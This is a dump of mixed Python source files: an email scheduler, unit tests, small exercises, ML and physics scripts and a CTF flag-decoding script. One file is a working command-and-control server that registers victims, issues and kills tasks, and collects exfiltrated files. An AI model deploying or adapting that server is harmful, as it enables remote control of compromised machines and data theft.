content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
import findspark
findspark.init('/opt/spark')
import schedule
import pyspark
from pyspark.sql import SparkSession
from pyspark.sql.functions import col, udf, lit
import random
import smtplib, ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import schedule
import time
from random import randrange
from datetime import date
from datetime import datetime
def get_spark_session():
return SparkSession.builder.master('local[*]')\
.config("spark.driver.memory", "12G").appName('EmailSender').getOrCreate()
def get_ingest_information():
spark = get_spark_session()
return spark.read.option('header', True).option('inferSchema', True)\
.option('delimiter', '|').csv('ingestor')
def get_avaliable_message(id_message=None):
df = get_ingest_information()
if id_message is None:
messages_avaliable = df.filter(col('processado').isNull()).collect()
return [random.choice(messages_avaliable)]
else:
return df.filter((col('processado').isNull()) & (col('id') == id_message)).collect()
def get_html_string(header, text):
return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
<head>
<!--[if gte mso 9]>
<xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:PixelsPerInch>96</o:PixelsPerInch>
</o:OfficeDocumentSettings>
</xml>
<![endif]-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="x-apple-disable-message-reformatting">
<!--[if !mso]><!--><meta http-equiv="X-UA-Compatible" content="IE=edge"><!--<![endif]-->
<title></title>
<style type="text/css">
table, td {{ color: #000000; }} @media only screen and (min-width: 670px) {{
.u-row {{
width: 80% !important;
}}
.u-row .u-col {{
vertical-align: top;
}}
.u-row .u-col-100 {{
width: 80% !important;
}}
}}
@media (max-width: 670px) {{
.u-row-container {{
max-width: 100% !important;
padding-left: 0px !important;
padding-right: 0px !important;
}}
.u-row .u-col {{
min-width: 320px !important;
max-width: 100% !important;
display: block !important;
}}
.u-row {{
width: calc(100% - 40px) !important;
}}
.u-col {{
width: 100% !important;
}}
.u-col > div {{
margin: 0 auto;
}}
}}
body {{
margin: 0;
padding: 0;
}}
table,
tr,
td {{
vertical-align: top;
border-collapse: collapse;
}}
p {{
margin: 0;
}}
.ie-container table,
.mso-container table {{
table-layout: fixed;
}}
* {{
line-height: inherit;
}}
a[x-apple-data-detectors='true'] {{
color: inherit !important;
text-decoration: none !important;
}}
</style>
<!--[if !mso]><!--><link href="https://fonts.googleapis.com/css?family=Lato:400,700&display=swap" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,700&display=swap" rel="stylesheet" type="text/css"><!--<![endif]-->
</head>
<body class="clean-body" style="margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #f9f9f9;color: #000000">
<!--[if IE]><div class="ie-container"><![endif]-->
<!--[if mso]><div class="mso-container"><![endif]-->
<table style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #f9f9f9;width:100%" cellpadding="0" cellspacing="0">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td align="center" style="background-color: #f9f9f9;"><![endif]-->
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 80%;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:80%;"><tr style="background-color: #ffffff;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="80%" style="width: 80%;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 80%;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<div style="color: #333333; line-height: 140%; text-align: left; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 140%; text-align: center;"><span style="font-size: 28px; line-height: 39.2px; font-family: 'Playfair Display', serif; color: #000000;">{0}</span></p>
</div>
</td>
</tr>
</tbody>
</table>
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="15%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 3px solid #ff0009;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:15px 30px 25px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<div style="line-height: 150%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 150%; text-align: center;"><span style="font-size: 16px; line-height: 24px; color: #555555; font-family: Lato, sans-serif;">{1}</span></p>
</div>
<br>
<div style="line-height: 150%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 150%; text-align: center;"><span style="font-size: 11px; line-height: 24px; color: #555555; font-family: Lato, sans-serif;">Miracle Bot ©</span></p>
</div>
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
</td>
</tr>
</tbody>
</table>
<!--[if mso]></div><![endif]-->
<!--[if IE]></div><![endif]-->
</body>
</html>
""".format(header, text)
def send_email(_is_first_message):
context = ssl.create_default_context()
sender_email = "Miracle Bot"
receiver_email = "[email protected]"
if _is_first_message:
message_info = get_avaliable_message(1)
else:
message_info = get_avaliable_message()
if len(message_info) > 0:
message = MIMEMultipart("alternative")
message["Subject"] = message_info[0].assunto
message["From"] = sender_email
message["To"] = receiver_email
html = get_html_string(message_info[0].titulo, message_info[0].mensagem)
part2 = MIMEText(html, "html")
message.attach(part2)
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login("", "")
server.sendmail(sender_email, receiver_email, message.as_string())
mark_message_as_send(message_info[0].id)
def mark_message_as_send(id_message):
df = get_ingest_information()
df = df.cache()
df_processed = df.filter(col('id') == id_message)
df_processed = df_processed.withColumn('processado', lit(1))
df = df.filter(col('id') != id_message)
df = df.union(df_processed)
df.count()
df.coalesce(1).write.mode('overwrite').option("header", "true").option("delimiter", "|").csv('ingestor')
df.unpersist()
if __name__ == '__main__':
messages_avaliable_count = get_ingest_information().filter(col('processado').isNull()).count()
if messages_avaliable_count > 0:
message_day_and_hour = []
message_days = random.sample(range(date.today().day+2, 30), messages_avaliable_count)
message_hours = [random.choice(range(5, 23)) for i in range(messages_avaliable_count)]
#Test
message_hours.pop()
message_hours.pop()
message_hours.pop()
message_hours.pop()
message_days.pop()
message_days.pop()
message_days.pop()
message_days.pop()
message_days.append(3)
message_hours.append(18)
message_days.append(3)
message_hours.append(19)
message_days.append(3)
message_hours.append(20)
message_days.append(3)
message_hours.append(21)
#Initial message
message_days[0] = 4
message_hours[0] = 0
is_first_message = True
while True:
now = datetime.now()
for index, day in enumerate(message_days):
if now.day == day and now.hour == message_hours[index]:
send_email(is_first_message)
message_days.remove(day)
message_hours.pop(index)
is_first_message = False
time.sleep(30)
if len(message_days) == 0:
break
|
python
|
class Test(object):
__slots__ = 'name', 'word_set', 'target', 'longest_subsequence',\
'verbose', 'actual'
def __init__(self, json_object):
self.name = json_object['name']
self.word_set = json_object['word_set']
self.target = json_object['target']
self.longest_subsequence = json_object['longest_subsequence']
self.verbose = json_object['verbose']
self.actual = None
def __str__(self):
return '{0}:\n\
word_set=[{1}]\n\
target={2}\n\
longest_subsequence={3}\n\
actual={4}'.format(
self.name,
','.join([self._get_quoted(w) for w in self.word_set]),
self._get_quoted(self.target),
self._get_quoted(self.longest_subsequence),
self._get_quoted(self.actual))
def _get_quoted(self, s):
return s if s is None else "'{0}'".format(s)
def run(self, subseq_func):
self.actual = subseq_func(self.target, self.word_set)
try:
assert self.longest_subsequence == self.actual,\
'{0} failure: expected={1}, actual={2}'.format(
self.name, self.longest_subsequence, self.actual)
except AssertionError as ae:
print(ae)
|
python
|
numbers = [int(el) for el in input().split(", ")]
positive = [str(x) for x in numbers if x >= 0]
negative = [str(x) for x in numbers if x < 0]
even = [str(x) for x in numbers if x % 2 == 0]
odd = [str(x) for x in numbers if not x % 2 == 0]
print("Positive:", ', '.join(positive))
print("Negative:", ', '.join(negative))
print("Even:", ', '.join(even))
print("Odd:", ', '.join(odd))
|
python
|
# ------ your setttings ------
TrainModule = 'OutputOshaberi' # your sensation folder name
device = 'cuda' # debugging device
# ------ end of settings -----
if __name__ == '__main__':
from importlib import import_module
from multiprocessing import Value
module = import_module(TrainModule)
func = module.Train(device,True)
shutdown = Value('i',False)
sleep = Value('i',True)
func(shutdown,sleep)
|
python
|
year = int(input())
if year%4==0:
cond=True
if year%100==0 and cond==True:
cond=False
if year%400==0 and cond==False:
print(f"{year} is a Leap Year!!")
else:
print(f"{year} is not a Leap Year")
|
python
|
from flask import Flask,request
import os
import base64
from lib.logger import Logger
from termcolor import colored
import sys
def main(mongoclient,server_logger,port):
app = Flask('app')
## Get the cookie/victim ID from a request
def get_cookie(request):
d = request.cookies
if d:
return base64.b64decode(d.to_dict()['session']).decode()
else:
return False
def get_victim_info(request):
return request.form.to_dict()
## Checks if we are running on docker container
def docker():
return os.path.isfile('/.dockerenv')
####################################### General beacon and sends task ####################################
@app.route('/',methods = ['GET', 'POST'])
def run():
if request.method == 'GET':
victim_id = get_cookie(request)
## Update last seen
if victim_id:
if victim_id in Victim.victims.keys():
victim_obj = Victim.victims[victim_id]
victim_obj.update_last_seen_status_to_db()
server_logger.info_log(f"Updated last seen of {victim_obj.victim_id}")
task = Task.find_unissued_task(victim_id)
## If there is any task
if task:
if task['command'] == 'kill':
task_obj = Task.load_task(task)
task_dict = task_obj.issue_dict()
## Kill the victim by sending 'Die' and also update db
Victim.victims[victim_id].status = 'Dead'
Victim.victims[victim_id].update_last_seen_status_to_db()
return 'Die'
else:
task_obj = Task.load_task(task)
task_dict = task_obj.issue_dict()
server_logger.info_log(f"Task issued, task id - {colored(task_dict['task_id'],'cyan')}",'green')
server_logger.info_log(f"Task info - {task_dict}",'green')
return task_dict
## Default reply of server incase no commands
return 'Nothing Fishy going on here :)'
## Not needed remove.
if request.method == 'POST':
print("Command to exfiltrate recieved...")
if not os.path.exists('./exfiltration'):
os.mkdir('./exfiltration')
## wb enables to write bianry
with open('./exfiltration/'+request.headers['Filename'], "wb") as f:
# Write bytes to file
f.write(request.data)
f.close()
return "OK"
####################################### Task output handler ####################################
@app.route('/<cmd>/output/<task_id>',methods = ['POST'])
def task_output(cmd,task_id):
if request.method == 'POST':
victim_id = get_cookie(request)
## Handling for various kind of tasks, also passing the task/module options set by user
output = Module.module_task_id[task_id].handle_task_output(request.data,Task.tasks[task_id].options,victim_id,task_id)
## Checking the output path is the default path, then we only give path from shared/victim/data
if f'shared/victim_data/{victim_id}' in os.path.abspath(output):
output_path = output.split('../../')[1]
else:
output_path = os.path.abspath(output)
server_logger.info_log(f"Recieved task output for task ID - {task_id} , Victim ID - {victim_id} , Command - {cmd}, Output - {colored('File dumped to '+output_path,'cyan')} accessible both though host and container.",'green')
task_obj = Task.tasks[task_id]
task_obj.insert_cmd_output(f"File dumped to {output_path}")
return "OK"
####################################### Staging / Initial request from the victim ####################################
@app.route('/stage_0',methods = ['POST'])
def stage():
if request.method == 'POST':
## Get the victim id of the new victim
victim_id = get_cookie(request)
## Get the other info about the victim
info = get_victim_info(request)
if victim_id not in Victim.victims:
## instantiate a new victim object
victim_obj = Victim(victim_id = victim_id,platform = info['platform'],os_version = info['version'],admin = info['admin'],location= info['location'])
if victim_obj:
server_logger.info_log(f"New victim checked in - {victim_id} , {info['platform']}",'green')
return ('Victim registered', 200)
else:
Victim.victims[victim_id].status = 'Alive'
Victim.victims[victim_id].location = info['location'] ## Incase changed
Victim.victims[victim_id].update_location_to_db()
return ('Victim already registered', 302)
return ('Bad request', 400)
####################################### Client Error Recieved ####################################
@app.route('/clienterror',methods = ['POST'])
def clienterror():
if request.method == 'POST':
server_logger.info_log(f"Recieved error from victim - {request.data.decode('utf-8')}",'yellow')
return ('Error Recieved, we will get back to you', 200)
app.run(host = '0.0.0.0', port = port)
def get_db_info():
if 'MONGODB_USERNAME' not in os.environ:
os.environ['MONGODB_USERNAME'] = ''
if 'MONGODB_PASSWORD' not in os.environ:
os.environ['MONGODB_PASSWORD'] = ''
if 'MONGODB_HOSTNAME' not in os.environ:
os.environ['MONGODB_HOSTNAME'] = '127.0.0.1'
if 'MONGODB_DATABASE' not in os.environ:
os.environ['MONGODB_DATABASE'] = 'SpyderC2'
print(colored("You can set these environment variables - MONGODB_USERNAME , MONGODB_PASSWORD , MONGODB_HOSTNAME , MONGODB_DATABASE",'blue'))
db_url = "mongodb://"
if os.environ['MONGODB_USERNAME'] != '' and os.environ['MONGODB_PASSWORD'] != '':
db_url += f"{os.environ['MONGODB_USERNAME']}:{os.environ['MONGODB_PASSWORD']}@"
db_url += f"{os.environ['MONGODB_HOSTNAME']}:27017/{os.environ['MONGODB_DATABASE']}"
return db_url
if __name__=="__main__":
if len(sys.argv) >= 2:
port = sys.argv[1]
else:
port = '8080'
server_logger = Logger(logdir='logs',logfile='logs',verbose=False )
server_logger.setup()
db_url = get_db_info()
from lib.database import Database
from lib.module import Module
from lib.task import Task
from lib.victim import Victim
db_object = Database(url=db_url)
server_logger.info_log(f"Initiated database connection from main- {db_url}",'green')
Victim.mongoclient = db_object.mongoclient
Task.mongoclient = db_object.mongoclient
if db_object.db_data_exists():
db_object.load_db_data()
main(db_object.mongoclient,server_logger,port)
|
python
|
'''
PyTorch Dataset Handling. The dataset folder should comprise of two subfolders namely "train" and "test" where both folders has subfolders that named
according to their class names.
'''
import os
import glob
import cv2
import torch
from torch.utils import data
from torch.utils.data import Dataset, dataset
class LoadDataset(Dataset):
'''Loads the dataset from the given path.
'''
def __init__(self, dataset_folder_path, image_size=128, image_depth=3, train=True, transform=None):
'''Parameter Init.
'''
assert not dataset_folder_path is None, "Path to the dataset folder must be provided!"
self.dataset_folder_path = dataset_folder_path
self.transform = transform
self.image_size = image_size
self.image_depth = image_depth
self.train = train
self.classes = sorted(self.get_classnames())
self.image_path_label = self.read_folder()
def get_classnames(self):
'''Returns the name of the classes in the dataset.
'''
return os.listdir(f"{self.dataset_folder_path.rstrip('/')}/train/" )
def read_folder(self):
'''Reads the folder for the images with their corresponding label (foldername).
'''
image_path_label = []
if self.train:
folder_path = f"{self.dataset_folder_path.rstrip('/')}/train/"
else:
folder_path = f"{self.dataset_folder_path.rstrip('/')}/test/"
for x in glob.glob(folder_path + "**", recursive=True):
if not x.endswith('jpg'):
continue
class_idx = self.classes.index(x.split('/')[-2])
image_path_label.append((x, int(class_idx)))
return image_path_label
def __len__(self):
'''Returns the total size of the data.
'''
return len(self.image_path_label)
def __getitem__(self, idx):
'''Returns a single image and its corresponding label.
'''
if torch.is_tensor(idx):
idx = idx.tolist()
image, label = self.image_path_label[idx]
if self.image_depth == 1:
image = cv2.imread(image, 0)
else:
image = cv2.imread(image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (self.image_size, self.image_size))
if self.transform:
image = self.transform(image)
return {
'image': image,
'label': label
}
class LoadInputImages(Dataset):
'''Loads the dataset for visualization.
'''
def __init__(self, input_folder, image_size, image_depth, transform=None):
'''Param init.
'''
self.input_folder = input_folder.rstrip('/') + '/'
self.image_size = image_size
self.image_depth = image_depth
self.transform = transform
self.image_paths = self.read_folder()
def read_folder(self):
'''Reads all the image paths in the given folder.
'''
image_paths = []
for x in glob.glob(self.input_folder + '**'):
if not x.endswith('jpg'):
continue
image_paths.append(x)
return image_paths
def __len__(self):
'''Returns the total number of images in the folder.
'''
return len(self.image_paths)
def __getitem__(self, idx):
'''Returns a single image array.
'''
if torch.is_tensor(idx):
idx = idx.tolist()
image = self.image_paths[idx]
if self.image_depth == 1:
image = cv2.imread(image, 0)
else:
image = cv2.imread(image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (self.image_size, self.image_size))
if self.transform:
image = self.transform(image)
return image
|
python
|
import numpy as np
from perturbative_solver import solve_oscillon
from matplotlib import pyplot as plt
from progress.bar import Bar
############################################################################
# Edit these parameters:
############################################################################
# the values of the frequency to consider:
w_range = np.linspace(0.5, 0.6, 30)
# the Fourier coefficients of the potential. If they do not sum to one,
# another one will be added to satisfy the sum:
coeffs = np.array([1.0])
# the size of the spatial box:
L = 20.0
# the spatial step size:
dr = 0.01
# number of perturbative harmonics:
N_harmonics = 3
# number of backreaction iterations:
N_iterations = 2
############################################################################
# Compute power curve and lifetime:
############################################################################
def calculate_lifecycle(w_range, coeffs, N_harmonics=3):
"""
Auxiliary function to compute lifetime over a range of frequencies.
"""
power_range = np.empty_like(w_range)
energy_range = np.empty_like(w_range)
# iterate through frequencies and collect power and energy information:
with Bar('Processing', max=len(w_range)) as bar:
for i, w in enumerate(w_range):
R, S1, c_harmonics, S_harmonics, power, energy = solve_oscillon(
w,
coeffs=coeffs,
N_iterations=N_iterations,
N_harmonics=N_harmonics,
dr=dr,
L=L)
power_range[i] = power
energy_range[i] = energy
bar.next()
bar.finish()
# lifetime is only integrated over segments of decreasing energy:
lifetime = -(np.diff(energy_range)[np.diff(energy_range) < 0] /
power_range[1:][np.diff(energy_range) < 0]).sum()
print(np.log10(lifetime))
return np.log10(lifetime), power_range, energy_range
if __name__ == '__main__':
# add the coefficient to satisfy the sum-to-one criterion, if needed:
if coeffs.sum() != 1.0:
coeffs = np.hstack((coeffs, [1.0 - coeffs.sum()]))
log10lifetime, power_curve, energy_curve = calculate_lifecycle(
w_range, coeffs)
print('log10(lifetime)=', log10lifetime)
# plot decreasing-energy and increasing-energy segments separately:
for i in range(len(power_curve) - 1):
if energy_curve[i + 1] - energy_curve[i] <= 0:
plt.plot(w_range[[i, i + 1]],
power_curve[[i, i + 1]],
'b-',
lw=2.0)
else:
plt.plot(w_range[[i, i + 1]],
power_curve[[i, i + 1]],
'r--',
lw=1.0,
alpha=0.5)
plt.xlabel('Frequency (m)', fontsize=14)
plt.ylabel(r'Power ($f^2$)', fontsize=14)
plt.yscale('log')
plt.show()
|
python
|
from PIL import Image
from csv import reader
inputFilename: str = "./dist/flag.csv"
outputFilename: str = "./writeup/flag.png"
with open(inputFilename, "r") as csv_file:
csv_reader = reader(csv_file)
list_of_rows = list(csv_reader)
size = [len(list_of_rows[0]), len(list_of_rows)]
outputImage: Image = Image.new("RGB", size)
with open(outputFilename, mode="w") as f:
for x in range(size[0]):
for y in range(size[1]):
cell = list_of_rows[y][x].zfill(6)
r: int = int(cell[:2], 16)
g: int = int(cell[2:4], 16)
b: int = int(cell[4:], 16)
outputImage.putpixel((x, y), (r, g, b))
outputImage.save(outputFilename)
print("finish writeout to " + outputFilename)
|
python
|
import unittest
import ttrw
from unittest.mock import patch
test_dictionary = {
"en": {
"adverbs": ["test"],
"adjectives": ["test"],
"nouns": ["test"]
},
"pl": {
"adverbs": ["bardzo"],
"adjectives": ["maly"],
"nouns": ["ksiazka"]
}
}
class TestTTRW(unittest.TestCase):
def test_supported_language(self):
for lang in ttrw.languages:
s = ttrw.get_random_words(lang)
self.assertGreater(len(s), 0)
self.assertTrue(type(s) is str)
def test_unsupported_language(self):
self.assertRaises(ValueError, lambda: ttrw.get_random_words("xxx"))
def test_fake_dic(self):
with patch.dict("ttrw.words", test_dictionary):
s = ttrw.get_random_words("en")
self.assertEqual(s, "TestTestTest")
def test_polish_gend(self):
with patch.dict("ttrw.words", test_dictionary):
s = ttrw.get_random_words("pl")
self.assertEqual(s, "BardzoMalaKsiazka")
if __name__ == '__main__':
unittest.main()
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from numpy import array, ndarray
import unittest
from pyquil import Program, get_qc
from pyquil.gates import X, MEASURE
from nisqai.measure._measurement_outcome import MeasurementOutcome
class TestMeasuremnetOutcome(unittest.TestCase):
@staticmethod
def get_all_zeros_outcome(nqubits, nshots):
"""Helper function that returns the outcome of all zeros.
Args:
nqubits : int
Number of qubits in the circuit.
nshots : int
Number of shots to simulate the circuit.
"""
prog = Program()
creg = prog.declare("ro", memory_type="BIT", memory_size=nqubits)
prog += [MEASURE(q, creg[q]) for q in range(nqubits)]
prog.wrap_in_numshots_loop(nshots)
computer = get_qc("{}q-qvm".format(nqubits))
return computer.run(prog)
@staticmethod
def get_all_ones_outcome(nqubits, nshots):
"""Helper function that returns the outcome of all ones.
Args:
nqubits : int
Number of qubits in the circuit.
nshots : int
Number of shots to simulate the circuit.
"""
prog = Program()
creg = prog.declare("ro", memory_type="BIT", memory_size=nqubits)
prog += [X(q) for q in range(nqubits)]
prog += [MEASURE(q, creg[q]) for q in range(nqubits)]
prog.wrap_in_numshots_loop(nshots)
computer = get_qc("{}q-qvm".format(nqubits))
return computer.run(prog)
def test_basic(self):
"""Tests that a MeasurementOutcome can be instantiated."""
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(4, 10)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertTrue((outcome.raw_outcome == result).all())
def test_num_qubits(self):
"""Tests that a MeasurementOutcome has the right qubit number."""
# number of qubits
nqubits = 4
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, 10)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertEqual(outcome.num_qubits, nqubits)
def test_num_shots(self):
"""Tests that a MeasurementOutcome has the right number of shots."""
# number of qubits
nqubits = 4
# number of shots
nshots = 40
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, nshots)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertEqual(outcome.shots, nshots)
def test_get_item(self):
"""Tests getting an item from a measurement outcome."""
# number of qubits
nqubits = 5
# number of shots
nshots = 40
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, nshots)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
self.assertEqual(len(outcome[0]), 5)
def test_len(self):
"""Tests the length of a measurement outcome."""
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits=2, nshots=1000)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
self.assertEqual(len(outcome), 1000)
def test_as_int(self):
"""Tests the integer value of bit strings is correct."""
# get some measurement outcomes
zeros = MeasurementOutcome(self.get_all_zeros_outcome(nqubits=2, nshots=20))
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=2, nshots=20))
# checks for zeros
self.assertTrue(type(zeros.as_int(0)), int)
self.assertEqual(zeros.as_int(0), 0)
# checks for ones
self.assertTrue(type(ones.as_int(0)), int)
self.assertEqual(ones.as_int(0), 3)
def test_as_int_big_int(self):
"""Tests the integer value of bit strings for large integers."""
# get a measurement outcome
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=10, nshots=20))
# checks for ones
self.assertTrue(type(ones.as_int(0)), int)
self.assertEqual(ones.as_int(0), 2**10 - 1)
def test_average_all_zeros(self):
"""Tests the average outcome of all zero measurements is all zeros."""
# Get an all zero MeasurementOutcome
zeros = MeasurementOutcome(self.get_all_zeros_outcome(nqubits=4, nshots=20))
# Compute the average
avg = zeros.average()
# Make sure it's all zeros
self.assertTrue(type(avg) == ndarray)
self.assertEqual(len(avg), zeros.num_qubits)
self.assertTrue(sum(avg) == 0)
def test_average_all_ones(self):
"""Tests the average outcome of all ones measurements is all ones."""
# Get an all zero MeasurementOutcome
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=4, nshots=20))
# Compute the average
avg = ones.average()
# Make sure it's all zeros
self.assertTrue(type(avg) == ndarray)
self.assertEqual(len(avg), ones.num_qubits)
self.assertTrue(sum(avg) == ones.num_qubits)
def test_average(self):
"""Tests that the average is computed correctly for a given raw outcome."""
# Example result
result = array([[1, 0], [0, 1]])
# Make a MeasurementOutcome
meas = MeasurementOutcome(result)
# Compute the average
avg = meas.average()
# Make sure its correct
self.assertAlmostEqual(avg[0], 0.5)
self.assertAlmostEqual(avg[1], 0.5)
if __name__ == "__main__":
unittest.main()
|
python
|
import graphene
from graphql_auth.bases import MutationMixin, DynamicArgsMixin
from users.mixins import PasswordSetAdminMixin
class PasswordSetAdmin(MutationMixin, DynamicArgsMixin, PasswordSetAdminMixin, graphene.Mutation):
_required_args = ["new_password1", "new_password2"]
class Arguments:
id = graphene.ID(required=True)
|
python
|
# -*- coding: utf-8 -*-
import os
import unittest
import sqlite3
import tempfile
import bottle
from bottle.ext import sqlite
''' python3 moves unicode to str '''
try:
unicode
except NameError:
unicode = str
class SQLiteTest(unittest.TestCase):
def setUp(self):
self.app = bottle.Bottle(catchall=False)
_, dbfile = tempfile.mkstemp(suffix='.sqlite')
self.plugin = self.app.install(sqlite.Plugin(dbfile=dbfile))
self.conn = sqlite3.connect(dbfile)
self.conn.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
self.conn.commit()
def tearDown(self):
os.unlink(self.plugin.dbfile)
def test_with_keyword(self):
@self.app.get('/')
def test(db):
self.assertEqual(type(db), type(sqlite3.connect(':memory:')))
self._request('/')
def test_without_keyword(self):
@self.app.get('/')
def test_1():
pass
self._request('/')
@self.app.get('/2')
def test_2(**kw):
self.assertFalse('db' in kw)
self._request('/2')
def test_install_conflicts(self):
self.app.install(sqlite.Plugin(keyword='db2'))
@self.app.get('/')
def test(db, db2):
pass
# I have two plugins working with different names
self._request('/')
def test_text_factory(self):
# set text factory to str, unicode (default) would cause
# PrammingError: You must not use 8-bit bytestrings .. exception
self.app.install(sqlite.Plugin(keyword='db2',text_factory=str))
@self.app.get('/')
def test(db, db2):
char = 'ööö'
db2.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
db2.execute("INSERT INTO todo (id,task) VALUES ('1',:TEST)", { "TEST": char })
count = len(db2.execute("SELECT * FROM todo").fetchall())
self.assertEqual(count, 1)
self._request('/')
def test_text_factory_fail(self):
self.app.install(sqlite.Plugin(keyword='db3',text_factory=unicode))
@self.app.get('/')
def test(db, db3):
char = 'ööö'
db3.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
try:
db3.execute("INSERT INTO todo (id,task) VALUES ('1',:TEST)", { "TEST": char })
except sqlite3.ProgrammingError as e:
pass
self._request('/')
def test_user_functions(self):
class SumSq:
def __init__(self):
self.result = 0
def step(self, value):
if value:
self.result += value**2
def finalize(self):
return self.result
def collate_reverse(string1, string2):
if string1 == string2:
return 0
elif string1 < string2:
return 1
else:
return -1
testfunc1 = lambda: 'test'
testfunc2 = lambda x: x + 1
self.app.install(sqlite.Plugin(
keyword='db4',
functions={'testfunc1': (0, testfunc1), 'testfunc2': (1, testfunc2)},
aggregates={'sumsq': (1, SumSq)},
collations={'reverse': collate_reverse},
))
@self.app.get('/')
def test(db, db4):
db4.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
result = db4.execute("SELECT testfunc1(), testfunc2(2)").fetchone()
self.assertEqual(tuple(result), ('test', 3))
db4.execute("INSERT INTO todo VALUES (10, 'a')")
db4.execute("INSERT INTO todo VALUES (11, 'a')")
db4.execute("INSERT INTO todo VALUES (12, 'a')")
result = db4.execute("SELECT sumsq(id) FROM todo WHERE task='a'").fetchone()
self.assertEqual(tuple(result), (365,))
result = db4.execute("SELECT ('a' < 'b' COLLATE reverse)").fetchone()
self.assertEqual(tuple(result), (0,))
self._request('/')
def test_raise_sqlite_integrity_error(self):
